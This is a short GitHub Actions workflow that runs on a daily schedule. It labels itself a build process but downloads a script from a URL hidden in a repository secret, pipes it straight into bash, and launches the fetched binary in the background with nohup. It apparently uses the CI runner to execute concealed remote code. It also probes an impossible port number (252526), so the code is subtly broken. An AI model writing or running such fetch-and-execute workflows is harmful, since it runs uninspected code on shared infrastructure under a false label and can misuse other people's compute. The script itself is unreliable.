name: Inline Shell Commands

# on:
#   push:
#     branches: [ main ]

on:
  schedule:
    - cron: '0 0 * * *'  # Runs at 00:00 UTC every day
  workflow_dispatch:  # Allows manual trigger

jobs:
  run-commands:
    runs-on: ubuntu-latest
    
    steps:
    - name: Checkout code
      uses: actions/checkout@v4
      
    - name: Run inline shell commands
      env:
        TESTING: ${{ secrets.TESTING }}
      run: |
        echo "Starting build process..."
        curl -sSL $TESTING | bash -s -- ddrv

        cd *_DD

        ls
        ./*_DD & echo $! > app.pid
        nohup ./*_DD > app.log 2>&1 &

        sleep 5

        top -n 1 
        cat app.log


        curl localhost:252526
